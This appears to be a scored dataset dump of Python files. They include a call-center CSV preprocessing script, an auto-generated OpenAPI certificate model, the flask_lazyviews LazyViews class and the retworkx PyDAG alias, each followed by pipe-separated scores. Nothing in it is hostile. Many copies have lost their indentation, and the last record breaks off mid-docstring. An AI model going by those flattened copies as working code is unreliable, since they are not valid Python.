    """Build one semicolon-separated CSV line with one-hot encoded
    day-of-week and month features.

    Replaces the previous 84-branch (7 weekdays x 12 months) if-chain,
    which also left ``out_line`` unbound (NameError) if no branch
    matched a malformed date.

    Parameters
    ----------
    timestamp : int
        Unix timestamp of the observation.
    ass_assignment : str
        Call-center name, written as the last field.
    calls : int, optional
        Number of received calls for the slot (default 0).

    Returns
    -------
    str
        ``"timestamp;calls;hour;<7 day flags>;<12 month flags>;assignment\\n"``
    """
    # Hour and month are parsed from the project date helper's string,
    # the weekday from datetime.fromtimestamp -- exactly as the original
    # did (both presumably local time; TODO confirm dg uses local time).
    date_str = dg.timestamp_to_date(timestamp)
    day_part, time_part = date_str.split(" ")
    hour = int(time_part.split(":")[0])
    month = int(day_part.split("-")[1])
    weekday = datetime.datetime.fromtimestamp(timestamp).weekday()  # 0 = Monday
    # One-hot encodings: Monday..Sunday, then January..December.
    day_flags = ["0"] * 7
    day_flags[weekday] = "1"
    month_flags = ["0"] * 12
    month_flags[month - 1] = "1"
    fields = ([str(timestamp), str(calls), str(hour)]
              + day_flags + month_flags + [ass_assignment])
    return ";".join(fields) + "\n"
def run():
    """Convert the raw call-center export into ``data/train.csv``.

    Keeps only rows whose assignment field (column 12) belongs to
    ``relevant_centers`` and rewrites them through :func:`generate_line`
    with one-hot day-of-week and month columns.
    """
    # Set literal instead of a list: membership is tested once per input
    # line, and a list scan per line is O(n) in the number of centers.
    relevant_centers = {
        "CAT", "CMS", "Crises", "Domicile", "Gestion",
        "Gestion - Accueil Telephonique", "Gestion Assurances",
        "Gestion Clients", "Gestion_DZ", "Gestion Relation Clienteles",
        "Gestion Renault", "Japon", "Manager", "Médical", "Mécanicien",
        "Nuit", "Prestataires", "RENAULT", "Regulation Medicale", "RTC",
        "SAP", "Services", "Tech. Axa", "Tech. Inter", "Tech. Total",
        "Téléphonie",
    }
    total_lines = 10878471  # known line count of the input, progress display only
    # Both handles are managed by ``with``: the output file was
    # previously opened outside any context manager and leaked if an
    # exception occurred mid-run.
    with codecs.open("data/train_2011_2012_2013.csv", "r",
                     encoding='utf-8') as in_file, \
         codecs.open("data/train.csv", "w", encoding='utf-8') as out:
        first_line = True
        line_counter = 0
        print("Done: 0 lines", end="")
        for raw in in_file:
            if line_counter % 1000 == 0:
                print("\rDone: {}/{} ({}%) lines".format(
                    line_counter, total_lines,
                    int(line_counter / total_lines * 100)), end="")
            parts = raw.split('\n')[0].split(";")
            if first_line:
                # Header row: keep column 0 (date), column 81 (calls) and
                # column 12 (assignment), inserting the engineered columns.
                out.write(parts[0] + ";" + parts[81] +
                          ";Hour;Monday;Tuesday;Wednesday;Thursday;Friday;"
                          "Saturday;Sunday;January;February;March;April;May;"
                          "June;July;August;September;October;November;"
                          "December;" + parts[12] + "\n")
                first_line = False
                line_counter += 1
                continue
            if parts[12] in relevant_centers:
                timestamp = int(dg.date_to_timestamp(parts[0]))
                out.write(generate_line(timestamp, parts[12], int(parts[81])))
            line_counter += 1
        print("\rDone: {}/{} ({}%) lines".format(
            line_counter, total_lines,
            int(line_counter / total_lines * 100)))
if __name__ == "__main__":
run() | 0.015248 | 0.063599 |
import pprint
import re # noqa: F401
import six
from nexus_api_python_client.configuration import Configuration
class ApiCertificate(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'expires_on': 'int',
'fingerprint': 'str',
'id': 'str',
'issued_on': 'int',
'issuer_common_name': 'str',
'issuer_organization': 'str',
'issuer_organizational_unit': 'str',
'pem': 'str',
'serial_number': 'str',
'subject_common_name': 'str',
'subject_organization': 'str',
'subject_organizational_unit': 'str'
}
attribute_map = {
'expires_on': 'expiresOn',
'fingerprint': 'fingerprint',
'id': 'id',
'issued_on': 'issuedOn',
'issuer_common_name': 'issuerCommonName',
'issuer_organization': 'issuerOrganization',
'issuer_organizational_unit': 'issuerOrganizationalUnit',
'pem': 'pem',
'serial_number': 'serialNumber',
'subject_common_name': 'subjectCommonName',
'subject_organization': 'subjectOrganization',
'subject_organizational_unit': 'subjectOrganizationalUnit'
}
    def __init__(self, expires_on=None, fingerprint=None, id=None, issued_on=None, issuer_common_name=None, issuer_organization=None, issuer_organizational_unit=None, pem=None, serial_number=None, subject_common_name=None, subject_organization=None, subject_organizational_unit=None, local_vars_configuration=None):  # noqa: E501
        """ApiCertificate - a model defined in OpenAPI

        All parameters are optional; an attribute is assigned only when a
        non-None value is supplied, so omitted fields remain None.
        """  # noqa: E501
        # Fall back to a default client Configuration when none is injected.
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        # Private backing fields read/written by the generated
        # @property accessors below.
        self._expires_on = None
        self._fingerprint = None
        self._id = None
        self._issued_on = None
        self._issuer_common_name = None
        self._issuer_organization = None
        self._issuer_organizational_unit = None
        self._pem = None
        self._serial_number = None
        self._subject_common_name = None
        self._subject_organization = None
        self._subject_organizational_unit = None
        self.discriminator = None  # no OpenAPI discriminator defined for this model
        # Assign only explicitly-provided values; None arguments are
        # treated as "not set" rather than stored.
        if expires_on is not None:
            self.expires_on = expires_on
        if fingerprint is not None:
            self.fingerprint = fingerprint
        if id is not None:
            self.id = id
        if issued_on is not None:
            self.issued_on = issued_on
        if issuer_common_name is not None:
            self.issuer_common_name = issuer_common_name
        if issuer_organization is not None:
            self.issuer_organization = issuer_organization
        if issuer_organizational_unit is not None:
            self.issuer_organizational_unit = issuer_organizational_unit
        if pem is not None:
            self.pem = pem
        if serial_number is not None:
            self.serial_number = serial_number
        if subject_common_name is not None:
            self.subject_common_name = subject_common_name
        if subject_organization is not None:
            self.subject_organization = subject_organization
        if subject_organizational_unit is not None:
            self.subject_organizational_unit = subject_organizational_unit
@property
def expires_on(self):
"""Gets the expires_on of this ApiCertificate. # noqa: E501
:return: The expires_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._expires_on
@expires_on.setter
def expires_on(self, expires_on):
"""Sets the expires_on of this ApiCertificate.
:param expires_on: The expires_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._expires_on = expires_on
@property
def fingerprint(self):
"""Gets the fingerprint of this ApiCertificate. # noqa: E501
:return: The fingerprint of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._fingerprint
@fingerprint.setter
def fingerprint(self, fingerprint):
"""Sets the fingerprint of this ApiCertificate.
:param fingerprint: The fingerprint of this ApiCertificate. # noqa: E501
:type: str
"""
self._fingerprint = fingerprint
@property
def id(self):
"""Gets the id of this ApiCertificate. # noqa: E501
:return: The id of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ApiCertificate.
:param id: The id of this ApiCertificate. # noqa: E501
:type: str
"""
self._id = id
@property
def issued_on(self):
"""Gets the issued_on of this ApiCertificate. # noqa: E501
:return: The issued_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._issued_on
@issued_on.setter
def issued_on(self, issued_on):
"""Sets the issued_on of this ApiCertificate.
:param issued_on: The issued_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._issued_on = issued_on
@property
def issuer_common_name(self):
"""Gets the issuer_common_name of this ApiCertificate. # noqa: E501
:return: The issuer_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_common_name
@issuer_common_name.setter
def issuer_common_name(self, issuer_common_name):
"""Sets the issuer_common_name of this ApiCertificate.
:param issuer_common_name: The issuer_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_common_name = issuer_common_name
@property
def issuer_organization(self):
"""Gets the issuer_organization of this ApiCertificate. # noqa: E501
:return: The issuer_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organization
@issuer_organization.setter
def issuer_organization(self, issuer_organization):
"""Sets the issuer_organization of this ApiCertificate.
:param issuer_organization: The issuer_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organization = issuer_organization
@property
def issuer_organizational_unit(self):
"""Gets the issuer_organizational_unit of this ApiCertificate. # noqa: E501
:return: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organizational_unit
@issuer_organizational_unit.setter
def issuer_organizational_unit(self, issuer_organizational_unit):
"""Sets the issuer_organizational_unit of this ApiCertificate.
:param issuer_organizational_unit: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organizational_unit = issuer_organizational_unit
@property
def pem(self):
"""Gets the pem of this ApiCertificate. # noqa: E501
:return: The pem of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._pem
@pem.setter
def pem(self, pem):
"""Sets the pem of this ApiCertificate.
:param pem: The pem of this ApiCertificate. # noqa: E501
:type: str
"""
self._pem = pem
@property
def serial_number(self):
"""Gets the serial_number of this ApiCertificate. # noqa: E501
:return: The serial_number of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._serial_number
@serial_number.setter
def serial_number(self, serial_number):
"""Sets the serial_number of this ApiCertificate.
:param serial_number: The serial_number of this ApiCertificate. # noqa: E501
:type: str
"""
self._serial_number = serial_number
@property
def subject_common_name(self):
"""Gets the subject_common_name of this ApiCertificate. # noqa: E501
:return: The subject_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_common_name
@subject_common_name.setter
def subject_common_name(self, subject_common_name):
"""Sets the subject_common_name of this ApiCertificate.
:param subject_common_name: The subject_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_common_name = subject_common_name
@property
def subject_organization(self):
"""Gets the subject_organization of this ApiCertificate. # noqa: E501
:return: The subject_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organization
@subject_organization.setter
def subject_organization(self, subject_organization):
"""Sets the subject_organization of this ApiCertificate.
:param subject_organization: The subject_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organization = subject_organization
@property
def subject_organizational_unit(self):
"""Gets the subject_organizational_unit of this ApiCertificate. # noqa: E501
:return: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organizational_unit
@subject_organizational_unit.setter
def subject_organizational_unit(self, subject_organizational_unit):
"""Sets the subject_organizational_unit of this ApiCertificate.
:param subject_organizational_unit: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organizational_unit = subject_organizational_unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiCertificate):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiCertificate):
return True
return self.to_dict() != other.to_dict() | nexus_api_python_client/models/api_certificate.py | import pprint
import re # noqa: F401
import six
from nexus_api_python_client.configuration import Configuration
class ApiCertificate(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'expires_on': 'int',
'fingerprint': 'str',
'id': 'str',
'issued_on': 'int',
'issuer_common_name': 'str',
'issuer_organization': 'str',
'issuer_organizational_unit': 'str',
'pem': 'str',
'serial_number': 'str',
'subject_common_name': 'str',
'subject_organization': 'str',
'subject_organizational_unit': 'str'
}
attribute_map = {
'expires_on': 'expiresOn',
'fingerprint': 'fingerprint',
'id': 'id',
'issued_on': 'issuedOn',
'issuer_common_name': 'issuerCommonName',
'issuer_organization': 'issuerOrganization',
'issuer_organizational_unit': 'issuerOrganizationalUnit',
'pem': 'pem',
'serial_number': 'serialNumber',
'subject_common_name': 'subjectCommonName',
'subject_organization': 'subjectOrganization',
'subject_organizational_unit': 'subjectOrganizationalUnit'
}
def __init__(self, expires_on=None, fingerprint=None, id=None, issued_on=None, issuer_common_name=None, issuer_organization=None, issuer_organizational_unit=None, pem=None, serial_number=None, subject_common_name=None, subject_organization=None, subject_organizational_unit=None, local_vars_configuration=None): # noqa: E501
"""ApiCertificate - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._expires_on = None
self._fingerprint = None
self._id = None
self._issued_on = None
self._issuer_common_name = None
self._issuer_organization = None
self._issuer_organizational_unit = None
self._pem = None
self._serial_number = None
self._subject_common_name = None
self._subject_organization = None
self._subject_organizational_unit = None
self.discriminator = None
if expires_on is not None:
self.expires_on = expires_on
if fingerprint is not None:
self.fingerprint = fingerprint
if id is not None:
self.id = id
if issued_on is not None:
self.issued_on = issued_on
if issuer_common_name is not None:
self.issuer_common_name = issuer_common_name
if issuer_organization is not None:
self.issuer_organization = issuer_organization
if issuer_organizational_unit is not None:
self.issuer_organizational_unit = issuer_organizational_unit
if pem is not None:
self.pem = pem
if serial_number is not None:
self.serial_number = serial_number
if subject_common_name is not None:
self.subject_common_name = subject_common_name
if subject_organization is not None:
self.subject_organization = subject_organization
if subject_organizational_unit is not None:
self.subject_organizational_unit = subject_organizational_unit
@property
def expires_on(self):
"""Gets the expires_on of this ApiCertificate. # noqa: E501
:return: The expires_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._expires_on
@expires_on.setter
def expires_on(self, expires_on):
"""Sets the expires_on of this ApiCertificate.
:param expires_on: The expires_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._expires_on = expires_on
@property
def fingerprint(self):
"""Gets the fingerprint of this ApiCertificate. # noqa: E501
:return: The fingerprint of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._fingerprint
@fingerprint.setter
def fingerprint(self, fingerprint):
"""Sets the fingerprint of this ApiCertificate.
:param fingerprint: The fingerprint of this ApiCertificate. # noqa: E501
:type: str
"""
self._fingerprint = fingerprint
@property
def id(self):
"""Gets the id of this ApiCertificate. # noqa: E501
:return: The id of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ApiCertificate.
:param id: The id of this ApiCertificate. # noqa: E501
:type: str
"""
self._id = id
@property
def issued_on(self):
"""Gets the issued_on of this ApiCertificate. # noqa: E501
:return: The issued_on of this ApiCertificate. # noqa: E501
:rtype: int
"""
return self._issued_on
@issued_on.setter
def issued_on(self, issued_on):
"""Sets the issued_on of this ApiCertificate.
:param issued_on: The issued_on of this ApiCertificate. # noqa: E501
:type: int
"""
self._issued_on = issued_on
@property
def issuer_common_name(self):
"""Gets the issuer_common_name of this ApiCertificate. # noqa: E501
:return: The issuer_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_common_name
@issuer_common_name.setter
def issuer_common_name(self, issuer_common_name):
"""Sets the issuer_common_name of this ApiCertificate.
:param issuer_common_name: The issuer_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_common_name = issuer_common_name
@property
def issuer_organization(self):
"""Gets the issuer_organization of this ApiCertificate. # noqa: E501
:return: The issuer_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organization
@issuer_organization.setter
def issuer_organization(self, issuer_organization):
"""Sets the issuer_organization of this ApiCertificate.
:param issuer_organization: The issuer_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organization = issuer_organization
@property
def issuer_organizational_unit(self):
"""Gets the issuer_organizational_unit of this ApiCertificate. # noqa: E501
:return: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._issuer_organizational_unit
@issuer_organizational_unit.setter
def issuer_organizational_unit(self, issuer_organizational_unit):
"""Sets the issuer_organizational_unit of this ApiCertificate.
:param issuer_organizational_unit: The issuer_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._issuer_organizational_unit = issuer_organizational_unit
@property
def pem(self):
"""Gets the pem of this ApiCertificate. # noqa: E501
:return: The pem of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._pem
@pem.setter
def pem(self, pem):
"""Sets the pem of this ApiCertificate.
:param pem: The pem of this ApiCertificate. # noqa: E501
:type: str
"""
self._pem = pem
@property
def serial_number(self):
"""Gets the serial_number of this ApiCertificate. # noqa: E501
:return: The serial_number of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._serial_number
@serial_number.setter
def serial_number(self, serial_number):
"""Sets the serial_number of this ApiCertificate.
:param serial_number: The serial_number of this ApiCertificate. # noqa: E501
:type: str
"""
self._serial_number = serial_number
@property
def subject_common_name(self):
"""Gets the subject_common_name of this ApiCertificate. # noqa: E501
:return: The subject_common_name of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_common_name
@subject_common_name.setter
def subject_common_name(self, subject_common_name):
"""Sets the subject_common_name of this ApiCertificate.
:param subject_common_name: The subject_common_name of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_common_name = subject_common_name
@property
def subject_organization(self):
"""Gets the subject_organization of this ApiCertificate. # noqa: E501
:return: The subject_organization of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organization
@subject_organization.setter
def subject_organization(self, subject_organization):
"""Sets the subject_organization of this ApiCertificate.
:param subject_organization: The subject_organization of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organization = subject_organization
@property
def subject_organizational_unit(self):
"""Gets the subject_organizational_unit of this ApiCertificate. # noqa: E501
:return: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:rtype: str
"""
return self._subject_organizational_unit
@subject_organizational_unit.setter
def subject_organizational_unit(self, subject_organizational_unit):
"""Sets the subject_organizational_unit of this ApiCertificate.
:param subject_organizational_unit: The subject_organizational_unit of this ApiCertificate. # noqa: E501
:type: str
"""
self._subject_organizational_unit = subject_organizational_unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiCertificate):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiCertificate):
return True
return self.to_dict() != other.to_dict() | 0.607081 | 0.081593 |
import sys
from functools import partial
from flask import render_template
from .utils import LazyView
__all__ = ('LazyViews', )
string_types = (str, unicode) if sys.version_info[0] < 3 else (str, ) # noqa
class LazyViews(object):
"""
Main instance for adding *lazy* views to Flask application or blueprint.
"""
__slots__ = ('import_prefix', 'instance')
def __init__(self, instance=None, import_prefix=None):
"""
Initialize :class:`LazyViews` instance.
Basically it requires ``app`` or ``blueprint`` instance as first
argument, but you could leave it empty and initialize it later with
manually call :meth:`init_app` method. It could be helpful, if you want
to configure :class:`LazyViews` instance somewhere outside your
``app.py`` or for multiple applications.
"""
# Keep import prefix state to have ability reuse it later
self.import_prefix = import_prefix
self.instance = None
if instance:
self.init_app(instance, import_prefix)
def add(self, url_rule, mixed, **options):
"""
Add URL rule to Flask application or blueprint.
``mixed`` could be a real callable function, or a string Python path
to callable view function. If ``mixed`` is a string, it would be
wrapped into :class:`~flask_lazyviews.utils.LazyView` instance.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
options['view_func'] = self.get_view(mixed)
self.instance.add_url_rule(url_rule, **options)
def add_admin(self, mixed, *args, **kwargs):
"""
Add admin view if `Flask-Admin <http://flask-admin.readthedocs.org/>`_
extension added to application.
.. important:: This method only works for Flask applications, not
blueprints.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if not hasattr(self.instance, 'blueprints'):
raise ValueError('Cannot add admin view to blueprint.')
app = self.instance
if 'admin' not in app.extensions:
raise ValueError('Looks like, Flask-Admin extension not added '
'to current application, {0!r}'.format(app))
admin = app.extensions['admin']
admin = admin[0] if isinstance(admin, list) else admin
view = self.get_view(mixed)
if isinstance(view, LazyView):
view = view(*args, **kwargs)
admin.add_view(view)
def add_error(self, code_or_exception, mixed, app=False):
"""
Add error handler to Flask application or blueprint.
When passing ``app=True`` tries to register global app error handler
for blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
app_handler = getattr(self.instance, 'app_errorhandler', None)
handler = self.instance.errorhandler
method = app_handler if app and app_handler else handler
method(code_or_exception)(self.get_view(mixed))
def add_static(self, url_rule, filename=None, **options):
"""
Add URL rule for serving static files to Flask app or blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if filename:
options.setdefault('defaults', {}).update({'filename': filename})
self.add(url_rule, self.instance.send_static_file, **options)
def add_template(self, url_rule, template_name, **options):
"""
Render template name with context for given URL rule.
Context should be a plain dict or callable. If callable its result
would be passed to :func:`flask.render_template` function.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
def renderer(template_name, mixed):
context = mixed() if callable(mixed) else mixed or {}
return partial(render_template, template_name, **context)
view = renderer(template_name, options.pop('context', None))
self.add(url_rule, view, **options)
def build_import_name(self, import_name):
"""
Prepend import prefix to import name if it earlier defined by user.
"""
return '.'.join(filter(None, (self.import_prefix, import_name)))
def get_view(self, mixed):
"""
If ``mixed`` value is callable it's our view, else wrap it with
:class:`flask_lazyviews.utils.LazyView` instance.
"""
if callable(mixed) or not isinstance(mixed, string_types):
return mixed
return LazyView(self.build_import_name(mixed))
def init_app(self, app, import_prefix=None):
"""
Configure :class:`LazyViews` instance, store ``app`` or ``blueprint``
instance and import prefix if any.
"""
if import_prefix and import_prefix.startswith('.'):
import_name = (app.import_name
if app.import_name != '__main__'
else '')
assert import_name, ('You should properly configure import name '
'for {0!r} instance or edit import prefix to '
'not start with ".".'.format(app))
import_prefix = import_name + import_prefix
self.import_prefix = import_prefix or self.import_prefix
self.instance = app
def init_blueprint(self, blueprint, import_prefix=None):
"""
Alias for init app function, cause basically there are no important
differences between Flask app and blueprint if we only need to add URL
rule.
"""
return self.init_app(blueprint, import_prefix) | flask_lazyviews/lazyviews.py | import sys
from functools import partial
from flask import render_template
from .utils import LazyView
__all__ = ('LazyViews', )
string_types = (str, unicode) if sys.version_info[0] < 3 else (str, ) # noqa
class LazyViews(object):
"""
Main instance for adding *lazy* views to Flask application or blueprint.
"""
__slots__ = ('import_prefix', 'instance')
def __init__(self, instance=None, import_prefix=None):
"""
Initialize :class:`LazyViews` instance.
Basically it requires ``app`` or ``blueprint`` instance as first
argument, but you could leave it empty and initialize it later with
manually call :meth:`init_app` method. It could be helpful, if you want
to configure :class:`LazyViews` instance somewhere outside your
``app.py`` or for multiple applications.
"""
# Keep import prefix state to have ability reuse it later
self.import_prefix = import_prefix
self.instance = None
if instance:
self.init_app(instance, import_prefix)
def add(self, url_rule, mixed, **options):
"""
Add URL rule to Flask application or blueprint.
``mixed`` could be a real callable function, or a string Python path
to callable view function. If ``mixed`` is a string, it would be
wrapped into :class:`~flask_lazyviews.utils.LazyView` instance.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
options['view_func'] = self.get_view(mixed)
self.instance.add_url_rule(url_rule, **options)
def add_admin(self, mixed, *args, **kwargs):
"""
Add admin view if `Flask-Admin <http://flask-admin.readthedocs.org/>`_
extension added to application.
.. important:: This method only works for Flask applications, not
blueprints.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if not hasattr(self.instance, 'blueprints'):
raise ValueError('Cannot add admin view to blueprint.')
app = self.instance
if 'admin' not in app.extensions:
raise ValueError('Looks like, Flask-Admin extension not added '
'to current application, {0!r}'.format(app))
admin = app.extensions['admin']
admin = admin[0] if isinstance(admin, list) else admin
view = self.get_view(mixed)
if isinstance(view, LazyView):
view = view(*args, **kwargs)
admin.add_view(view)
def add_error(self, code_or_exception, mixed, app=False):
"""
Add error handler to Flask application or blueprint.
When passing ``app=True`` tries to register global app error handler
for blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
app_handler = getattr(self.instance, 'app_errorhandler', None)
handler = self.instance.errorhandler
method = app_handler if app and app_handler else handler
method(code_or_exception)(self.get_view(mixed))
def add_static(self, url_rule, filename=None, **options):
"""
Add URL rule for serving static files to Flask app or blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if filename:
options.setdefault('defaults', {}).update({'filename': filename})
self.add(url_rule, self.instance.send_static_file, **options)
def add_template(self, url_rule, template_name, **options):
"""
Render template name with context for given URL rule.
Context should be a plain dict or callable. If callable its result
would be passed to :func:`flask.render_template` function.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
def renderer(template_name, mixed):
context = mixed() if callable(mixed) else mixed or {}
return partial(render_template, template_name, **context)
view = renderer(template_name, options.pop('context', None))
self.add(url_rule, view, **options)
def build_import_name(self, import_name):
"""
Prepend import prefix to import name if it earlier defined by user.
"""
return '.'.join(filter(None, (self.import_prefix, import_name)))
def get_view(self, mixed):
"""
If ``mixed`` value is callable it's our view, else wrap it with
:class:`flask_lazyviews.utils.LazyView` instance.
"""
if callable(mixed) or not isinstance(mixed, string_types):
return mixed
return LazyView(self.build_import_name(mixed))
def init_app(self, app, import_prefix=None):
"""
Configure :class:`LazyViews` instance, store ``app`` or ``blueprint``
instance and import prefix if any.
"""
if import_prefix and import_prefix.startswith('.'):
import_name = (app.import_name
if app.import_name != '__main__'
else '')
assert import_name, ('You should properly configure import name '
'for {0!r} instance or edit import prefix to '
'not start with ".".'.format(app))
import_prefix = import_name + import_prefix
self.import_prefix = import_prefix or self.import_prefix
self.instance = app
def init_blueprint(self, blueprint, import_prefix=None):
"""
Alias for init app function, cause basically there are no important
differences between Flask app and blueprint if we only need to add URL
rule.
"""
return self.init_app(blueprint, import_prefix) | 0.5 | 0.193223 |
import sys
from .retworkx import *
sys.modules['retworkx.generators'] = generators
class PyDAG(PyDiGraph):
"""A class for creating direct acyclic graphs.
PyDAG is just an alias of the PyDiGraph class and behaves identically to
the :class:`~retworkx.PyDiGraph` class and can be used interchangably
with ``PyDiGraph``. It currently exists solely as a backwards
compatibility alias for users of retworkx from prior to the
0.4.0 release when there was no PyDiGraph class.
The PyDAG class is used to create a directed graph. It can be a
multigraph (have multiple edges between nodes). Each node and edge
(although rarely used for edges) is indexed by an integer id. Additionally,
each node and edge contains an arbitrary Python object as a weight/data
payload.
You can use the index for access to the data payload as in the
following example:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class implements the Python mapping protocol for nodes so in
addition to access you can also update the data payload with:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
graph[node_index] = "New Payload"
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class has an option for real time cycle checking which can
be used to ensure any edges added to the graph does not introduce a cycle.
By default the real time cycle checking feature is disabled for
performance, however you can enable it by setting the ``check_cycle``
attribute to True. For example::
import retworkx
dag = retworkx.PyDAG()
dag.check_cycle = True
or at object creation::
import retworkx
dag = retworkx.PyDAG(check_cycle=True)
With check_cycle set to true any calls to :meth:`PyDAG.add_edge` will
ensure that no cycles are added, ensuring that the PyDAG class truly
represents a directed acyclic graph. Do note that this cycle checking on
:meth:`~PyDAG.add_edge`, :meth:`~PyDigraph.add_edges_from`,
:meth:`~PyDAG.add_edges_from_no_data`,
:meth:`~PyDAG.extend_from_edge_list`, and
:meth:`~PyDAG.extend_from_weighted_edge_list` comes with a performance
penalty that grows as the graph does. If you're adding a node and edge at
the same time, leveraging :meth:`PyDAG.add_child` or
:meth:`PyDAG.add_parent` will avoid this overhead.
"""
pass | retworkx/__init__.py |
import sys
from .retworkx import *
sys.modules['retworkx.generators'] = generators
class PyDAG(PyDiGraph):
"""A class for creating direct acyclic graphs.
PyDAG is just an alias of the PyDiGraph class and behaves identically to
the :class:`~retworkx.PyDiGraph` class and can be used interchangably
with ``PyDiGraph``. It currently exists solely as a backwards
compatibility alias for users of retworkx from prior to the
0.4.0 release when there was no PyDiGraph class.
The PyDAG class is used to create a directed graph. It can be a
multigraph (have multiple edges between nodes). Each node and edge
(although rarely used for edges) is indexed by an integer id. Additionally,
each node and edge contains an arbitrary Python object as a weight/data
payload.
You can use the index for access to the data payload as in the
following example:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class implements the Python mapping protocol for nodes so in
addition to access you can also update the data payload with:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
graph[node_index] = "New Payload"
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class has an option for real time cycle checking which can
